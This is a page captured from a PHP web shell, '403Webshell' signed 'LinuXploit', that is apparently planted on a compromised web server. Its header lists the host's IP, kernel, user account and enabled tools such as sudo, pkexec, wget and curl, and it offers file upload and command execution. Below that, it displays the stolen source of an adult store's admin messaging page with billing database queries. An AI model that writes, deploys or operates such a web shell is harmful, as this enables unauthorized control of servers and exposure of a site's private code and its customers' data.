403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.185
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/store.tiacyrusxxx.com/public_html/xfcadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/store.tiacyrusxxx.com/public_html/xfcadmin/adm.messages.php
<?php
include ('adm.config.php');

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
		if(isset($_POST['purchaseID']) && is_numeric($_POST['purchaseID'])) {
			$_GET['id'] = $_POST['purchaseID'];
		} 
		
		if(isset($_POST['itemType']) && is_numeric($_POST['itemType'])) {
			$_GET['type'] = $_POST['itemType'];
		}
}

if (isset($_GET['id']) && is_numeric($_GET['id']) && isset($_GET['type']) && is_numeric($_GET['type'])) {
	
	$purchaseID = $_GET['id'];
	$itemType = $_GET['type'];
	
	if ($userDetails->xfcadmin == 0) {
		// THIS IS A REGULAR USER
		$query = "SELECT * FROM cms_billing_purchases WHERE memberID = '" . $memberID . "' AND itemType = '".$itemType."' AND purchaseID = '".$purchaseID."'";
	} elseif ($userDetails->xfcadmin == 1) {
		// THIS IS A MODEL
		$query = "SELECT * FROM cms_billing_purchases WHERE itemID = '" . $userDetails->model_id . "' AND itemType = '".$itemType."' AND purchaseID = '".$purchaseID."'";
	} elseif ($userDetails->xfcadmin == 9) {
		// THIS IS TAMMY
		$query = "SELECT * FROM cms_billing_purchases WHERE purchaseID = '".$purchaseID."'";
	}
	
	$getPurchase = @mysql_query($query);
	if (@mysql_num_rows($getPurchase) == 0) { die("error count"); }
	$purchaseInfo = @mysql_fetch_object($getPurchase);

	if($itemType == 3) { // Custom Video
		$purchaseInfoDetails = cartCustomDetails($purchaseInfo->memberID, $purchaseInfo->relatedID);
	} elseif($itemType == 4) { // Custom Photoset
		$purchaseInfoDetails = cartCustomDetails($purchaseInfo->memberID, $purchaseInfo->relatedID);
	} elseif($itemType == 6) { // Private Chat
		$purchaseInfoDetails = cartPrivateDetails($purchaseInfo->memberID, $purchaseInfo->relatedID);			
	} else {
		die("invalid item type");	
	}

	$modelDetails = cartModel($purchaseInfoDetails->modelID, $itemType);
		
	$getPurchaser = @mysql_query("SELECT * FROM cms_members WHERE member_id = '".$purchaseInfo->memberID."'");
	$purchaserInfo = @mysql_fetch_object($getPurchaser);

/* POST */
	if ($_SERVER['REQUEST_METHOD'] == 'POST') {
		
		if(isset($_POST['formType'])) {
			$formType = $_POST['formType'];
		} else {
			die("missing form type");	
		}
		
		if(isset($_POST['purchaseID']) && is_numeric($_POST['purchaseID'])) {
			$purchaseID = $_POST['purchaseID'];
		} else {
			die("missing or invalid purchaseID");	
		}
		
		if(isset($_POST['itemType']) && is_numeric($_POST['itemType'])) {
			$itemType = $_POST['itemType'];
		} else {
			die("missing or invalid itemType");	
		}
		
		if($formType == "reply") {
			if(isset($_POST['messageReply']) && $_POST['messageReply'] != "") {
				$messageReply = $_POST['messageReply'];
			} else {
				die("no message");	
			}
			
			$insert = @mysql_query("INSERT INTO cms_billing_messages
									SET itemType = '".$itemType."',
									timestamp = NOW(),
									relatedID = '".$purchaseInfo->relatedID."',
									to_memberID = '".$purchaserInfo->member_id."',
									from_memberID = '".$member_id."',
									message = '".addslashes($messageReply)."'");
			
			notificationEmail(0,$purchaserInfo->member_id,"newMessage");
			header("location: adm.messages.php?id=".$purchaseID."&type=".$itemType."");
		} elseif($formType == "complete" && isset($_POST['completeConfirm']) && $_POST['completeConfirm'] == 1) {
			$update = @mysql_query("UPDATE cms_billing_purchases SET status = '1' WHERE purchaseID = '".$purchaseID."'");
			header("location: adm.messages.php?id=".$purchaseID."&type=".$itemType."");
		}
	}
	
/* POST */

$getMessages = @mysql_query("SELECT * FROM cms_billing_messages WHERE itemType = '".$itemType."' AND relatedID = '".$purchaseInfo->relatedID."' AND (to_memberID = '".$member_id."' OR from_memberID = '".$member_id."') ORDER BY timestamp ASC");

$updateMessages = @mysql_query("UPDATE cms_billing_messages SET to_memberID_read = '1' WHERE itemType = '".$itemType."' AND relatedID = '".$purchaseInfo->relatedID."' AND to_memberID = '".$member_id."'");

include ("adm.header.php");
?>

<h3>MESSAGE CENTER</h3>

<?php

if ($purchaseInfo->status == 0) {
	$textStatus = "PENDING!";
} else {
	$textStatus = "COMPLETED!";
}

echo '<h4>' . $modelDetails->title . '</h4><br />';
echo '<h5>' . $textStatus . '</h5><br />';

if($itemType == 3) { 

	echo '<strong>Category:</strong> ' . $purchaseInfoDetails->categoryName . '<br />';
	echo '<strong>Duration:</strong> ' . $purchaseInfoDetails->baseName . '<br />';
	echo '<strong>Deliver:</strong> ' . $purchaseInfoDetails->deliveryName . '<br />';
	echo '<strong>Description:</strong> ' . nl2br($purchaseInfoDetails->description) . '<br />';
} elseif($itemType == 4) { 

	echo '<strong>Category:</strong> ' . $purchaseInfoDetails->categoryName . '<br />';
	echo '<strong>Duration:</strong> ' . $purchaseInfoDetails->baseName . '<br />';
	echo '<strong>Deliver:</strong> ' . $purchaseInfoDetails->deliveryName . '<br />';
	echo '<strong>Description:</strong> ' . nl2br($purchaseInfoDetails->description) . '<br />';
} elseif($itemType == 6) { 

	echo '<strong>Duration:</strong> ' . $purchaseInfoDetails->duration . '<br />';
	echo '<strong>Preferred Date & Time:</strong> ' . $purchaseInfoDetails->preferredtime . '<br />';
	echo '<strong>Description:</strong> ' . nl2br($purchaseInfoDetails->description) . '<br />';
	
 }
 
 ?>

<br />

  <table class="table table-bordered table-hover table-condensed">
    <thead>
      <tr>
        <th class="col-md-2">Who</th>
        <th>Message</th>
      </tr>
    </thead>
    <tbody>
    
			<?php
			while ($row = @mysql_fetch_object($getMessages)) {
				if($row->from_memberID == $purchaseInfo->memberID) {
					$from = $purchaserInfo->display_name;
				} else {
					$from = $modelDetails->name;	
				}
			?>
				<tr>
					<td><?php echo $from; ?></td>
					<td><?php echo '<strong>' . date('l (m-d-y) @ h:i:s A',strtotime($row->timestamp)) . '</strong><br />' . nl2br($row->message); ?></td>
				</tr>
			<?php } ?>
    </tbody>
  </table>

<?php
	if($purchaseInfo->status == 0) { // && $userDetails->xfcadmin == 1) {
?>
<form action="adm.messages.php" method="POST" class="form-horizontal">  
  <div class="form-group">
    <label for="request_description" class="col-sm-2 control-label">Reply:</label>
    <div class="col-sm-10">
      <textarea class="form-control" rows="3" name="messageReply"></textarea>
    </div>
  </div>

  <div class="form-group">
    <div class="col-sm-offset-2 col-sm-10">
      <button type="submit" class="btn btn-default">     Send Reply     </button>
    </div>
  </div>
  <input type="hidden" name="formType" value="reply" />
  <input type="hidden" name="itemType" value="<?php echo $itemType; ?>" />
  <input type="hidden" name="purchaseID" value="<?php echo $purchaseID; ?>" />
</form>


<form action="adm.messages.php" method="POST" class="form-horizontal">
  <div class="form-group">
    <div class="col-sm-offset-8 col-lg-2">
                <select name="completeConfirm" class="form-control">
             <option value="0"> Please confirm... </option>
             <option value="1"> CONFIRMED </option>
            </select>
    </div>
        <div class="col-lg-2">
<button type="submit" class="btn btn-danger">     MARK AS COMPLETE     </button>
    </div>
  </div>
  <input type="hidden" name="formType" value="complete" />
  <input type="hidden" name="itemType" value="<?php echo $itemType; ?>" />
  <input type="hidden" name="purchaseID" value="<?php echo $purchaseID; ?>" />
</form>


<?php
	}
	include ('adm.footer.php');
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit